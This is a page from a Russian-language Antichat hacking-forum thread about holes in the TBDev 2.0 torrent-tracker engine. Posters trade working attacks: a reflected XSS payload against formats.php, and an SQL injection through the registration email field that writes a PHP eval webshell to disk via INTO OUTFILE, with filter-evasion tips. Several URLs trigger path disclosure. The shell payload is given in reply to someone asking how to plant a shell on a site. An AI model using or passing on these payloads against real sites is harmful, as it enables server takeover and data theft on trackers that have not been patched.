ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Трекер-движок TBDev 2.0
   
 
Страница 22 из 27 « Первая < 12 18 19 20 21 22 23 24 25 26 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #211  
Старый 21.08.2009, 15:23
ZonD80
Новичок
Регистрация: 29.10.2008
Сообщений: 5
Провел на форуме:
25077

Репутация: 4
По умолчанию
Ребят, хватит юну мучать, он прекрасно знает, где и какие дырки.

Давайте меня помучайте: http://dev.kinokpk.com/releases/Kinokpk.com_releaser_v.2.70.7z
 

  #212  
Старый 21.08.2009, 20:16
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию
Цитата:
Сообщение от ZonD80  
Ребят, хватит юну мучать, он прекрасно знает, где и какие дырки.

Давайте меня помучайте: http://dev.kinokpk.com/releases/Kinokpk.com_releaser_v.2.70.7z
Для таких обращений есть специальный раздел

Тут выкладывают то что сами нашли.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 

  #213  
Старый 22.08.2009, 00:45
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
КЫСС (XSS)
PHP код:
<form action="<?=$PHP_SELF;?>" method="get" name="form1">
http://127.0.0.1/treker/formats.php/%22%3E%3Cscript%3Ealert(/hi/);%3C/script%3E
Последний раз редактировалось HAXTA4OK; 24.12.2009 в 22:55..
 

  #214  
Старый 24.08.2009, 11:51
Dflbv
Новичок
Регистрация: 04.05.2009
Сообщений: 3
Провел на форуме:
18304

Репутация: 1
По умолчанию
что можно сделать если есть доступ к директорскому аку но нету доступа к админке (к блокам) как можно шелл залить?
 

  #215  
Старый 24.08.2009, 16:49
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию
Если у юзера в mysql есть права на запись,то в регистрации например вместо email вписываешь
Код:
'+union+select+'<? eval($a); ?>'+into+otfile+'C:/blablabla/1.php'/*
Вместо eval можно окно для загрузки,кто-то выкладывал вроде.
Вместо blablabla пишешь путь который тебе нужен,взять можно из ошибки. Например
Цитата:
http://site.ru/torrent/details.php?id[]=11111
Или в начале темы там выкладывали раскрытия путей.
У меня было один раз что "+" не катил,заменял на /**/.Так же если комментарий "/*" не катит,заменяй на -- или #
 

  #216  
Старый 24.08.2009, 21:07
Yuna
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме:
47299

Репутация: 18
По умолчанию
Цитата:
Если у юзера в mysql есть права на запись,то в регистрации например вместо email вписываешь
этот баг закрыт ваще-то уже...

ZonD80, а ты че? делай тему =))) может я еще не все знаю?
 

  #217  
Старый 26.08.2009, 23:29
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
тема тухнет ,вроде небыло этого раскрытия путей )))

http://127.0.0.1/treker/log.php?type[]=

http://127.0.0.1/treker/friends.php?action=delete&type[]=&targetid=2

http://127.0.0.1/treker/browse.php?search[]=&incldead=0&cat=0

какие баян напишите плиз =) а то все 21 страниц заново смареть лень
Последний раз редактировалось HAXTA4OK; 26.08.2009 в 23:47..
 

  #218  
Старый 27.08.2009, 11:51
vano793
Новичок
Регистрация: 07.12.2008
Сообщений: 4
Провел на форуме:
10412

Репутация: 1
По умолчанию
Цитата:
Сообщение от HAXTA4OK  
тема тухнет ,вроде небыло этого раскрытия путей )))

http://127.0.0.1/treker/log.php?type[]=

http://127.0.0.1/treker/friends.php?action=delete&type[]=&targetid=2

http://127.0.0.1/treker/browse.php?search[]=&incldead=0&cat=0

какие баян напишите плиз =) а то все 21 страниц заново смареть лень

Вот эта и на Kinokpk.com releaser
PHP код:
http://127.0.0.1/treker/log.php?type[]= 
 

  #219  
Старый 11.09.2009, 11:10
Dflbv
Новичок
Регистрация: 04.05.2009
Сообщений: 3
Провел на форуме:
18304

Репутация: 1
По умолчанию
раскрытие путей
/testip.php?ip=>
 

  #220  
Старый 15.09.2009, 15:18
Yuna
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме:
47299

Репутация: 18
По умолчанию
С форумом простились, аминь!

Мелкие пакости правки, и прочее прочее прочее:

1. Переведены языковые файлики на ArrayAccess.
2. Блокировка скрипта если включен regsiter_globals или не забитыми всяким хламом переменными
3. Привязка кукисов к подсети 255.255.0.0
4. Еще всякие мелочки, кому надо - diff в помощь

http://bit-torrent.kiev.ua/downloads.php?do=file&id=25
 
 
Страница 22 из 27 « Первая < 12 18 19 20 21 22 23 24 25 26 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Прошивку iPhone 2.0 взломали ещё до её выхода geforse Мировые новости. Обсуждения. 1 14.07.2008 22:41
Web 2.0 выходит на государственный уровень vadim399 Мировые новости. Обсуждения. 2 12.01.2008 18:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ